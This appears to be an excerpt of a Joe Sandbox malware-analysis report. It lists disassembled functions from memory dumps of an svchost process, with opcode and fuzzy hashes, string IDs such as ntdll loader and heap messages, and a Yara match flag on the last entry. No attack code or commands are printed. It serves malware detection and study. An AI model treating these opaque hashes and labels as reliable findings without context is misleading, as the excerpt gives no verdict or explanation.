                                          • Instruction ID: b127d04e308e54e1e1d1517372de0b1c43529b133f3e8ea653b882cdbd0854b2
                                          • Opcode Fuzzy Hash: 44640b5790a54bcd1a445ac6e01eeda066765daef696c89f33b6bf6c1cfdeedd
                                          • Instruction Fuzzy Hash: 17A1AE759116289BDB31EF64CC88BEAF7B8EF48700F1401E9E909A7250D7359E85CF64
                                          Function 036C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: 0aa7a9c2a0f2e9d52c4d0235ee905ae8f37854a63c46aaa244c036ded61b4868
                                          • Instruction ID: 7e3ddfb15f758bfb57fe84025e1f13cf8b8262dfa62131c6d5f1621e9372199b
                                          • Opcode Fuzzy Hash: 0aa7a9c2a0f2e9d52c4d0235ee905ae8f37854a63c46aaa244c036ded61b4868
                                          • Instruction Fuzzy Hash: 2381AD79619380AFE311DF14C944B6AB7E8FF85750F28892DF9809B390E778D904CB66
                                          Function 0366909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %$&$@
                                          • API String ID: 0-1537733988
                                          • Opcode ID: 3d9acb8db45a08a742aa0d550ee2a1bb4cd6f3b75c444a2991670da462a2c339
                                          • Instruction ID: 2a2ccd1cfe23d223016cc74ba0c8c4b6504665c8401736f8c002467b0c59ddd2
                                          • Opcode Fuzzy Hash: 3d9acb8db45a08a742aa0d550ee2a1bb4cd6f3b75c444a2991670da462a2c339
                                          • Instruction Fuzzy Hash: C871C1745087419FC714DF24C680A2BFBE9BF86758F14891DE8979B351C731D80ACB9A
                                          Function 0370B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0370B82A
                                          • GlobalizationUserSettings, xrefs: 0370B834
                                          • TargetNtPath, xrefs: 0370B82F
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: 3aaecf7e29bfde992202e6634c291bbe80133b10295fe86411ef0b49e38445ae
                                          • Instruction ID: 19108d0a0309964dab8fc0c3a7c00fbdcbb10abc091f9bfb249c985efe4116cf
                                          • Opcode Fuzzy Hash: 3aaecf7e29bfde992202e6634c291bbe80133b10295fe86411ef0b49e38445ae
                                          • Instruction Fuzzy Hash: 33616F76D51229EBDB31EB54CC88B9AB7F8AB14714F0101E9A509AB290C774DF80CF94
                                          Function 0362F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0368E6C6
                                          • HEAP: , xrefs: 0368E6B3
                                          • HEAP[%wZ]: , xrefs: 0368E6A6
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 5d138329f920074bbfe733780eff2e338b6ee6c556b30b7cb89b49d3e7b8d0ef
                                          • Instruction ID: a5376a3c1406178c61ae6691815ea3a972ce3b418ff9257a37480d5e1cf23467
                                          • Opcode Fuzzy Hash: 5d138329f920074bbfe733780eff2e338b6ee6c556b30b7cb89b49d3e7b8d0ef
                                          • Instruction Fuzzy Hash: CB51F335604B54EFD712EBA8C944BAAFBF8EF05300F0941A4E9418F792D779E951CB21
                                          Function 036DDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                          Download Yara Rule
                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 036DDC32
                                          • HEAP: , xrefs: 036DDC1F
                                          • HEAP[%wZ]: , xrefs: 036DDC12
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: 233070c64f5e25b08a90af233305c3895cebe0f3965d3a129b616b14f4fa89de
                                          • Instruction ID: e2e0cad41338870372b423a029cc99a66a253ce9193bc407400493f2810ebf9e
                                          • Opcode Fuzzy Hash: 233070c64f5e25b08a90af233305c3895cebe0f3965d3a129b616b14f4fa89de
                                          • Instruction Fuzzy Hash: C55138B5A046508ED374FB2AC944772B7F5DF46248F09888EE4D28B285D2B5D843DB61
                                          Function 0366C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 036A82DE
                                          • minkernel\ntdll\ldrinit.c, xrefs: 036A82E8
                                          • Failed to reallocate the system dirs string !, xrefs: 036A82D7
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 2b4500b0e1f66675598eed332122eb3a1364315c68c10e075157fb52747f53fe
                                          • Instruction ID: b360cf84716fd48b47fa1f1ea973f7cffda89a53c94513d7bb956deb83898c0b
                                          • Opcode Fuzzy Hash: 2b4500b0e1f66675598eed332122eb3a1364315c68c10e075157fb52747f53fe
                                          • Instruction Fuzzy Hash: C741D2B5644710ABC720FB68D944B5BBBE8EF49750F08892EF988DB350E774E8108B95
                                          Function 036616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 036A1B39
                                          • LdrpAllocateTls, xrefs: 036A1B40
                                          • minkernel\ntdll\ldrtls.c, xrefs: 036A1B4A
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: f0ffe6b0039a5e397ce3a4709f1b566266e5846a9202fce269022d74cd7569c3
                                          • Instruction ID: 0e6b3fa95e245f629c21fbb679521386f1262f1fb8696253639b508b5aefc277
                                          • Opcode Fuzzy Hash: f0ffe6b0039a5e397ce3a4709f1b566266e5846a9202fce269022d74cd7569c3
                                          • Instruction Fuzzy Hash: 814188B9A00608AFDB15DFA8C941AAEFBF5FF4A310F148119E506AB300E774AC00CB94
                                          Function 036EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 036EC1F1
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 036EC1C5
                                          • PreferredUILanguages, xrefs: 036EC212
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: d4de884c9876da6b4354e5e09cb4958300c13a97d461e9c7b3fb92f01925704f
                                          • Instruction ID: 16b1770528690e25bf75558f5efef2665a49f11f4e129dd5f3fcf586549cc995
                                          • Opcode Fuzzy Hash: d4de884c9876da6b4354e5e09cb4958300c13a97d461e9c7b3fb92f01925704f
                                          • Instruction Fuzzy Hash: 64418076E01219EFDB11DBD4C991FEEB7B8AB04700F14406AEA05B7290D7749A48CB58
                                          Function 036C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: 3b50ed8a2ea0ce7282ea76b6fc8ee0a812a7af163318e186c43a71546eb4ef8e
                                          • Instruction ID: d94733950ffe19fb7b61f30551103cbb0a40077397c0b82cb9caa2f4cc4d33ec
                                          • Opcode Fuzzy Hash: 3b50ed8a2ea0ce7282ea76b6fc8ee0a812a7af163318e186c43a71546eb4ef8e
                                          • Instruction Fuzzy Hash: 4E41E275910388CBEB23DBA6C960BBDBBB8EF55340F28045DD841EF791DA398901CB14
                                          Function 036B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 036B4899
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 036B4888
                                          • LdrpCheckRedirection, xrefs: 036B488F
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: 47e162de139afe3140592014bf4b268a9a1b2c2432c332b13ff1702cd8560791
                                          • Instruction ID: 6ded236eca08a572a5f2b8fc5a4ac22cc2535a90e5a0c99886313ba69f5eb555
                                          • Opcode Fuzzy Hash: 47e162de139afe3140592014bf4b268a9a1b2c2432c332b13ff1702cd8560791
                                          • Instruction Fuzzy Hash: 3141D732A007509FCB22CE6AD944AA6BBF9EF49650F09056DEC59DB353DB30D880CF91
                                          Function 036633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • Actx , xrefs: 036633AC
                                          • RtlCreateActivationContext, xrefs: 036A29F9
                                          • SXS: %s() passed the empty activation context data, xrefs: 036A29FE
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                          • API String ID: 0-859632880
                                          • Opcode ID: 51373ccda66aa8f280aff8351b7eec90434d4e731b6229602dededce9e453326
                                          • Instruction ID: 72cdb6ae428f45c4bed7370226165ab3b6c4fe25471c16fbf783fbcb92778904
                                          • Opcode Fuzzy Hash: 51373ccda66aa8f280aff8351b7eec90434d4e731b6229602dededce9e453326
                                          • Instruction Fuzzy Hash: 293144366403019FDB26DE58C990B9AB7A4BF44750F288469EE059F3A2CB70DC41CBA0
                                          Function 03661607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          Strings
                                          • DLL "%wZ" has TLS information at %p, xrefs: 036A1A40
                                          • minkernel\ntdll\ldrtls.c, xrefs: 036A1A51
                                          • LdrpInitializeTls, xrefs: 036A1A47
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 28c13e21bc57232204b2a05fc0144cec4ab7ce77b6a2b3488ef7cae3a2c851cf
                                          • Instruction ID: 36935fc0e9a02787b3bea93ff2d28eb9fc2d26be417a951e71a556c775132e61
                                          • Opcode Fuzzy Hash: 28c13e21bc57232204b2a05fc0144cec4ab7ce77b6a2b3488ef7cae3a2c851cf
                                          • Instruction Fuzzy Hash: F9312835A00205ABEB20DB58C985F7AB6BCFB537A4F08446DE505FB280E7B4AE558790
                                          Function 03671270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                          Download Yara Rule
                                          Strings
                                          • BuildLabEx, xrefs: 0367130F
                                          • @, xrefs: 036712A5
                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0367127B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3051831665
                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction ID: 4fd8307c7188cca98d1c06d6c092a7e7207332b4a941d40c4c93114e25f6681b
                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction Fuzzy Hash: E131D17690061CAFCB11EFA5CC44EEEBBBDEB85720F50442AE915AB260E730DE05CB54
                                          Function 036B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 036B2104
                                          • LdrpInitializationFailure, xrefs: 036B20FA
                                          • Process initialization failed with status 0x%08lx, xrefs: 036B20F3
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: e8b3e3e79338b02f87d36a5d5dc13f48748e430264bbde7ff24d847d1943a523
                                          • Instruction ID: 0a4142e7039449d8c5900139c798d5195d42f4a2dcdf50c3be5e8e353acffa7e
                                          • Opcode Fuzzy Hash: e8b3e3e79338b02f87d36a5d5dc13f48748e430264bbde7ff24d847d1943a523
                                          • Instruction Fuzzy Hash: C1F0FF34640308AFEA24EA4CCD62F9A7BA8EB40B14F080858F7006B281D2E4A9908A90
                                          Function 036403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 7343084effd2247b57d44dfc95ffa13bf232f305c97d3e47e988d96fa3b3bc15
                                          • Instruction ID: 214483f5722da649fb4074724e93516d4d52ecaf632acc76270ae9f323894c15
                                          • Opcode Fuzzy Hash: 7343084effd2247b57d44dfc95ffa13bf232f305c97d3e47e988d96fa3b3bc15
                                          • Instruction Fuzzy Hash: DD714975E00249DFDB01DFA9D990BAEB7B8AF08304F154069E905AB351EB34ED41CB65
                                          Function 036D705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: kLsE
                                          • API String ID: 3446177414-3058123920
                                          • Opcode ID: 27b7865bd071bd89595841fcebaa55175b416f99aa41f8a518e06fbcdd8b8374
                                          • Instruction ID: d82621cd518209afc43787bbdbc7af76903f94be15bbeefd24b72865a1c233f5
                                          • Opcode Fuzzy Hash: 27b7865bd071bd89595841fcebaa55175b416f99aa41f8a518e06fbcdd8b8374
                                          • Instruction Fuzzy Hash: 404189719013504BE731FF65E949B697FA4AB11724F1C821EEC909F2C9CBB84485C7A6
                                          Function 036452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524
                                          • Opcode ID: a3e669032be63148fc582e8a5b8326c8c8c066297ac3a3ed1e97b60e7826532c
                                          • Instruction ID: 1d838454005d71be900683d78218450bf63a32e8a8788f1aa21738fbb595d2ad
                                          • Opcode Fuzzy Hash: a3e669032be63148fc582e8a5b8326c8c8c066297ac3a3ed1e97b60e7826532c
                                          • Instruction Fuzzy Hash: 42329B749083118BDB24CF18C680B3EB7E5EF86754F18492EFA969B3A0E734D855CB52
                                          Function 036FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: cebbe5c1e45975bd4e18db08795638696fde61b0f6d2d619a94603a1c12eeb5e
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 27C1CC312043429FDB24CF68C945B6BFBE5AF84318F088A2CFA99CA290D775E505CF95
                                          Function 03630CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                          Download Yara Rule
                                          Strings
                                          • Failed to retrieve service checksum., xrefs: 0368EE56
                                          • ResIdCount less than 2., xrefs: 0368EEC9
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                          • API String ID: 0-863616075
                                          • Opcode ID: 5394d5e181c4a2895e3fb1b3525a552485fc303b5465257c9142ff308d4625f6
                                          • Instruction ID: c06d777cc868bbf6faafbc9238541352489e38bbc7d462d7af199cd1c1d58a35
                                          • Opcode Fuzzy Hash: 5394d5e181c4a2895e3fb1b3525a552485fc303b5465257c9142ff308d4625f6
                                          • Instruction Fuzzy Hash: C4E1E0B59087849FE324CF15C440BABFBE4FB89314F048A2EE5998B381DB759909CF56
                                          Function 036AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: f5bdff143d2a6c4c470b4854320c26fd364a918296e06342076583e22fc87f59
                                          • Instruction ID: 68e6d25f5e0dc5de08392799fb5897809773a15d80569401355860d50e0182c5
                                          • Opcode Fuzzy Hash: f5bdff143d2a6c4c470b4854320c26fd364a918296e06342076583e22fc87f59
                                          • Instruction Fuzzy Hash: 0D614975E00B089FDB24DFA88980AAEBBB9FB44700F14406DE559EB291D732AD01CF54
                                          Function 0364F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$
                                          • API String ID: 0-233714265
                                          • Opcode ID: c41bc117ed7162076341a955c59028e4e2cc6c521d759bc0a91d0352d730e7f3
                                          • Instruction ID: 1060b068f425ea77d3a0190241a6fadc331c18ccc876f4f26073853ce85301e8
                                          • Opcode Fuzzy Hash: c41bc117ed7162076341a955c59028e4e2cc6c521d759bc0a91d0352d730e7f3
                                          • Instruction Fuzzy Hash: F361A675E0074ADFDB20EFA4C684BA9BBB5BF48304F18446DE515AF680CB74A941CB94
                                          Function 0363A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0363A2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0363A309
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                          • Instruction ID: 970e1e6c2eb5572221054081cb045306dc4f79b8e693fbf99f600cbcc0516843
                                          • Opcode Fuzzy Hash: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                          • Instruction Fuzzy Hash: 2541B034A04649DBEF15CF99C950BAAB7F8EF46304F2844AADC40DB3A5E335D941CB41
                                          Function 0366329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@
                                          • API String ID: 0-380025441
                                          • Opcode ID: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                          • Instruction ID: 1eeef98b9222b5c2e4068286194c2290e8919a001eb6d77d27bba13261c55ff4
                                          • Opcode Fuzzy Hash: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                          • Instruction Fuzzy Hash: FC31B37A508344EFC311DF28C980A5BBBE8FBC5694F58092EF59597360EA30DD05CB92
                                          Function 0363C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                          • Instruction ID: def04f2a4e08c6e44b639ae7ec58c3fd4a0cda41ca06e85e6e39239bf36bdefd
                                          • Opcode Fuzzy Hash: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                          • Instruction Fuzzy Hash: 3F824975E002189BDB24CFA9C980BEDFBB5FF4A710F188169E85AAB391D7309D41CB54
                                          Function 03682F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: P`owRbow
                                          • API String ID: 0-263301770
                                          • Opcode ID: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                          • Instruction ID: bdd28e9116e0171cc4b69c70332d2b31decd27e6efcac9248ed54c8a0f30740a
                                          • Opcode Fuzzy Hash: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                          • Instruction Fuzzy Hash: 0842F37DD04249AADF29EF68DA546BDFBB0AF0DB10F3C825AD441AB380D7748981CB54
                                          Function 03637370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                          • Instruction ID: c72d7e21aa660630aab053b34df6614b7166a4c03696f19f6f4eac8964624f97
                                          • Opcode Fuzzy Hash: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                          • Instruction Fuzzy Hash: 4DA18FB5608342CFD724DF28C580A2ABBE9FF89314F24496EE5858B351D730E945CB92
                                          Function 03652E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                          • Instruction ID: 6f20ff28364915122a468ccee0b0b540335eec60431b9d76cfb865f03a52b7c9
                                          • Opcode Fuzzy Hash: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                          • Instruction Fuzzy Hash: 6BF19E79608745CFDB21CF24C590B6ABBE5AF88A50F29487DFC8A8B340DB30D945CB52
                                          Function 004162BE Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
